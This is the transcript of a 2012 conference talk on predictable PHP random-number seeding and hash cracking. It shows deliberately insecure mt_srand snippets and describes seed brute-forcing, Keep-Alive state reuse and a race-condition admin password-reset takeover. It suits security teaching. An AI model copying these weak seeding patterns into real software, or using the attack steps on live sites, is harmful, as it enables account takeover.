Cryptography in web applications: vulnerabilities and attacks 21/08/2012 DCG #7812 Saint-Petersburg

Presentation on theme: "Cryptography in web applications: vulnerabilities and attacks 21/08/2012 DCG #7812 Saint-Petersburg"— Presentation transcript:

Cryptography in web applications: vulnerabilities and attacks 21/08/2012 DCG #7812 Saint-Petersburg by @d0znpp

[d0znpp@localhost ~]# whoami ONsec company: founder and expert Fun: security researcher, international speaker, bug hunter, Neuron-hackspace member (neuronspace.ru) Science: statistical algorithms and machine learning areas Defcon Russia (DCG #7812)

Introduction Where you can see crypto in webapps? passwords storage mechanism one-time passwords unique codes remember tokens CSRF tokens CAPTCHA etc Defcon Russia (DCG #7812)

Introduction Everything unique based on randoms In general randoms are pseudo random Every random values initiated by seed value Seed is your target. If you know seed, you know all "random" values. Each process has their seed Keep-alive connection share seed in many scripts Why you can know a seed value? Defcon Russia (DCG #7812)

Task #1 How do you hack it? mt_srand(microtime()*10000); mt_srand(getmypid()); \$secret = md5(mt_rand().mt_rand().mt_rand()); Defcon Russia (DCG #7812)

Problem #1. Weak seed Initiate rand from short-length seed mt_srand(microtime()*10000); mt_srand(getmypid()); Brute-force attack restores seed Defcon Russia (DCG #7812)

Task #2 How do you hack it? mt_srand((double)microtime()*1000000); mt_srand(uniqid("",true)); \$secret = md5(mt_rand().mt_rand().mt_rand()); Defcon Russia (DCG #7812)

Problem #2. Predicated seed Initiate rand from predicated seed mt_srand((double)microtime()*1000000); Official PHP doc example (http://www.php.net/manual/en/function.m t-srand.php): function make_seed() { list(\$usec, \$sec) = explode(' ', microtime()); return (float) \$sec + ((float) \$usec * 100000);} Defcon Russia (DCG #7812)

Problem #3. Keep-Alive glue Stefan Esser, 2008 http://www.suspekt.org/2008/08/17/mt_srand -and-not-so-random-numbers/ Keep-Alive is your friend When some information is known about the internal state of the random number generator Keep-Alive HTTP request can make exploits very easy. Because follow request during a Keep-Alive HTTP connection are handled by the same process (same random number generator) the state of the random number generator stays the same and random numbers can be precalculated from the outside. While this is always true for mod_php, it is not true for CGI and only sometimes true for fastcgi setup Defcon Russia (DCG #7812)

Problem #3. Keep-Alive glue Initiate random with predicated value: GET /newcaptha HTTP/1.1 Connection: Keep-Alive Generate predicated next random value GET /recoverpass HTTP/1.1 Connection: Keep-Alive Defcon Russia (DCG #7812)

Task #4 How do you hack it? function resetPassword(\$email){ if(userExists(\$email)){ mt_srand((double)microtime()*1000000); \$new_pass = md5(mt_rand()); if (sendPassByEmail(\$email,\$new_pass)){ updateUserPass(\$email,\$new_pass); }else return false; }else return false;} Defcon Russia (DCG #7812)

Problem #4. Race condition Defcon Russia (DCG #7812) mt_srand( (double) microtime()* 1000000) Q1: change my password Q2: change admin Q3: change my password Date:Tue, 21 Aug 2012 09:34:37 Locally brute microseconds Q1, Q3 Determine interval where Q2 are exists Remotely brute Q1 value

Problem #4. Race condition Request to reset self password Request to reset admin password Request to reset self password again Parse "Date" header in HTTP response Compare "Date" seconds in 3 responses (D1, D2, D3), D1>D2>D3 or D1>D2 (D3 in next second) If D1,D2,D3 seconds are different, try again Defcon Russia (DCG #7812)

Problem #4. Race condition Locally brute rand values R1, R3 from D1 and D3 responses (10^6 value for D1 and 10^6-R3 for D3) Now you know a short interval (R1;R3) where R2 are exists Remotely brute R2 via ~10^3 HTTP responses (not 10^6 anymore) Sucks where balancer/frontend are present Defcon Russia (DCG #7812)

Task #5 function generateMySafetyToken(){ mt_srand(\$really_random_value); \$salt = generateRandomString(8); \$newpass = generateRandomString(32); updateUser(\$salt.md5(\$newpass.\$reallyLongAndSec retSalt)); } function generateRandomString(\$l){ \$chars = “abcdeghijklmnopqrtuvwxz…”; for(\$i=0;\$i<\$l;\$i++) @\$r.=\$chars[mt_rand(0,strlen(\$chars)-1)]; return \$r; } Defcon Russia (DCG #7812)

Problem #5. Shared randoms Generating randoms and share it values in HTTP responses (various unique IDs) Seed value may be recovered by randoms By seed value you get all the values of randoms after shared Defcon Russia (DCG #7812)

Rands sequence length (bytes)Seeds count 1~ 3,5*10^7 (~= mt_getrandmax()/62) 2~ 5,5*10^5 3~ 9*10^3 4~ 150 5~ 4 Problem #5. Shared randoms How many random values you need to recover seed? mt_getrandmax() = 2^32/2 For 62 preset (a-z A-Z 0-9): Defcon Russia (DCG #7812)

Problem #5. Shared randoms Recovering seed by brute 2^32 values take 1,2 hour on my laptop CPUs (i7 1.8GHz) One PHP process for brute per each /proc/cpuinfo item Let me know if you want to get demo scripts ;) Defcon Russia (DCG #7812)

What about hashes? MD5 brute speed is about 11*10^9 hashes/sec on AMD Radeon HD6990 (~\$800) Tools: oclHashcat(pro/lite) ighashgpu johntheripper egbruteforcer (insidepro) Defcon Russia (DCG #7812)

Typically problems md5(\$salt.\$pass) really hard to brute at present moment Why? Read http://hashcat.net/forum/thread-1437.html for details Wait for new oclHashcat version (late 2012) Other tools has no md5(\$salt.\$pass) template Dictionary attacks really slow (~ 10^3 h/s) Defcon Russia (DCG #7812)

How much time to brute? Row MD5 brute speed (modern hardware) CPU: ~10^7 hash/sec150W GPU: ~10^10 hash/sec500W FPGU: ~10^11 hash/sec250W Defcon Russia (DCG #7812)

Thx & questions ??? Stefan Esser’s 2008 for great research Mykola Ilin (Defcon UA, Kiev) for answers and practice, theoretical base and others Neuronspace (haskspace Moscow) for all ;) Follow me: @d0znpp d0znpp[special char]ONsec.ru Defcon Russia (DCG #7812)

Download ppt "Cryptography in web applications: vulnerabilities and attacks 21/08/2012 DCG #7812 Saint-Petersburg"

Similar presentations